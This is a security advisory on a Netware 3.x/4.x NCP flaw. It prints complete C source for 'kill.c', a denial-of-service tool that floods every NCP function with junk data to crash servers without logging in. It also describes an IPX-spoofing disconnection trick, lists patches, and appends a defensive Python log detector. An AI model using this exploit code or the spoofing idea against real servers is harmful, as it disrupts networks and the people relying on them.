COMMAND

    NCP

SYSTEMS AFFECTED

    Netware 3.x/4.x

PROBLEM

    Jitsu-Disk discovered the following while experimenting  with  the
    Intrude  code  from  Pandora,  and  came  up  with  kill.c, an NCP
    garbage/flame thrower.  Compiled, it runs fine under Win95; for
    plain DOS, get the Csdpmi3b.zip file (the cwsdpmi DPMI host) from
    the following page:

        www.nmrc.org/pandora/download.html

    Exploit follows:

    /* Netware Killer, by Jitsu-Disk, march/98            */
    /* Greetz to the eleete team at www.nmrc.org          */
    /* Heavily inspired by the intrude source code        */
    /* in Pandora 2 by  oO Simple Nomad Oo                */
    /*                                                    */
    /******************************************************/
    /*                                                    */
    /* Compiles under GNU gcc for DOS (DJGPP v2.x)        */
    /* Must have a fast PC (min P100/16meg)               */
    /* Uses Win95 or DOS loaded with cwsdpmi              */
    /* You need to have the Network/IPX drivers loaded    */
    /* SOMETIMES WORKS WHEN NOT LOGGED INTO THE NETWORK   */
    /* BUT YOU NEED TO "SEE" THE NETWORK, i.e. WON'T WORK */
    /* RIGHT AFTER A LOGOUT                               */

    #include <stdio.h>   /* puts, printf */
    #include <dos.h>     /* union REGS, int86 (DJGPP) */

    typedef unsigned char uint8;   /* one byte */

    /*
     * INT 21h, multiple NCP requests with gibberish data will core dump
     * Netware servers (any flavor ??). Tested under Novell 4.11 with
     * a few patches.
     *
     * Issues NCP function f through the shell (AH=F2h, AL=function)
     * with an rl-byte request buffer and an al-byte reply buffer.
     * Returns the completion code from AL.
     */
    int shreq(int f, uint8 *req, int rl, uint8 *ans, int al) {
      union REGS r;
      r.w.cx=rl;                  /* request length */
      r.w.dx=al;                  /* reply buffer length */
      r.w.si=((unsigned)(req));   /* request buffer */
      r.w.di=((unsigned)(ans));   /* reply buffer */
      r.w.ax=0xf200|f;            /* shell request, NCP function in AL */
      int86(0x21,&r,&r);
      return(r.w.ax&0xff);
    }

    /* Set the preferred connection to server number c (0 = first server). */
    int setconn(int c) {
      union REGS r;
      r.w.ax=0xf000;  /* set preferred connection nr */
      r.w.dx=c+1;
      int86(0x21,&r,&r);
      return(r.w.ax&0xff);
    }

    /*
     * Main prog
     */
    int main(void)
    { int err, f;
      uint8 nonsense[5] = {0};   /* 5 bytes of junk request data */
      err=setconn(0);
      puts("This program will core dump Novell(tm) Servers");
      puts(" You do not need to be logged into the network to run this.");
      puts(" You do need to see the network i.e can't be used right after a logout.");
      puts(" This has also proved to crash the clients on a random basis.");
      if (err)
        printf("Failed to connect to server : %02x\n",err);
      /* walk every NCP function number with the same junk request */
      for(f=0;f<256;f++) shreq(f,nonsense,sizeof nonsense,nonsense,0);
      return 0;
    }

SOLUTION

    The latest service pack for Novell 3.1x/4.10 or  4.11/Intranetware
    (check for  410pt8a.exe or  iwsp4b.exe) corrects  this bug. However,
    the  way  the  patched  server  deals with the invalid connections
    introduces some curious glitches:

        1) It seems  that when you  reach NCP 130-131  all workstations
           connected  to  the  server  are  warned  that  "Station  xx
           attempted  a  remote  console  function  without sufficient
           permission"...  Apart from  the fact that  broadcasting the
           message is  a nag,  does that  mean that  prior to the patch
           one could  issue a  remote console  function that  would be
           processed without even being logged in?

        2) The way the patched server deals with the station when such
           a request  is issued  is to  kill all  connections with that
           station, leaving no choice but a reboot... It seems we have
           a nice denial of service here if we spoof the IPX address of
           some other station.
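    As an added defensive example (not part of the advisory and not
    Jitsu-Disk's code), the following Python scans server console
    output for the warning quoted in point 1 and reports two patterns
    an administrator would want to know about: a single station
    tripping the warning repeatedly, and a burst of many different
    station numbers tripping it within a few seconds, which is how the
    IPX-spoofing scenario in point 2 would look from the server side
    (the patched server drops every connection of each "offending"
    station). Only the warning text itself comes from the advisory;
    the timestamped line layout, the station numbers and the
    thresholds are constructed assumptions, since the page does not
    show the server's log format.

```python
import re
from collections import Counter
from datetime import datetime, timedelta

# Constructed sample of console output.  Only the warning sentence comes
# from the advisory; the "m/d/yy hh:mm:ss" prefix and the station numbers
# are assumptions made for this example.
SAMPLE_CONSOLE_LOG = """\
3/12/98 10:01:02 Station 12 attempted a remote console function without sufficient permission
3/12/98 10:01:03 Station 12 attempted a remote console function without sufficient permission
3/12/98 10:01:03 Station 12 attempted a remote console function without sufficient permission
3/12/98 10:09:47 Station 7 attempted a remote console function without sufficient permission
3/12/98 10:15:00 Station 21 attempted a remote console function without sufficient permission
3/12/98 10:15:00 Station 22 attempted a remote console function without sufficient permission
3/12/98 10:15:01 Station 23 attempted a remote console function without sufficient permission
3/12/98 10:15:01 Station 24 attempted a remote console function without sufficient permission
3/12/98 10:15:02 Server up time: 42 days
"""

WARNING_RE = re.compile(
    r"^(?P<ts>\d{1,2}/\d{1,2}/\d{2} \d{2}:\d{2}:\d{2}) "
    r"Station (?P<station>\d+) attempted a remote console function "
    r"without sufficient permission$"
)


def parse_warnings(text):
    """Return sorted (timestamp, station) pairs for every matching console
    line, skipping lines that are not this warning."""
    events = []
    for line in text.splitlines():
        m = WARNING_RE.match(line.strip())
        if not m:
            continue
        ts = datetime.strptime(m.group("ts"), "%m/%d/%y %H:%M:%S")
        events.append((ts, int(m.group("station"))))
    return sorted(events)


def repeat_offenders(events, min_count=3):
    """Stations that tripped the warning at least min_count times; one
    station doing so repeatedly deserves a closer look."""
    counts = Counter(station for _, station in events)
    return sorted(st for st, n in counts.items() if n >= min_count)


def spoof_bursts(events, window=timedelta(seconds=5), min_distinct=4):
    """Spans no longer than `window` in which at least `min_distinct`
    different stations tripped the warning.  Because the patched server
    kills every connection of the offending station, such a burst means
    many stations being knocked off at once, the pattern the advisory's
    IPX-spoofing remark would produce.  Returns (start, end, stations)
    tuples, each burst reported once."""
    bursts = []
    start = 0
    for end in range(len(events)):
        # Slide the window's left edge forward until the span fits.
        while events[end][0] - events[start][0] > window:
            start += 1
        stations = sorted({st for _, st in events[start:end + 1]})
        if len(stations) >= min_distinct:
            bursts.append((events[start][0], events[end][0], stations))
            start = end + 1  # do not re-report overlapping windows
    return bursts


def analyze(text):
    """Parse console text and return the two findings in one report."""
    events = parse_warnings(text)
    return {
        "events": len(events),
        "repeat_offenders": repeat_offenders(events),
        "bursts": spoof_bursts(events),
    }


if __name__ == "__main__":
    report = analyze(SAMPLE_CONSOLE_LOG)
    print(f"{report['events']} warnings parsed")
    print("repeat offenders:", report["repeat_offenders"])
    for start, end, stations in report["bursts"]:
        print(f"burst {start:%H:%M:%S}-{end:%H:%M:%S}: stations {stations}")
```

    Run against the sample, the report names station 12 as a repeat
    offender and one burst covering stations 21 through 24. The
    thresholds are deliberately low for the sample; on a real server
    they would be tuned to how often legitimate remote console
    attempts trip the warning.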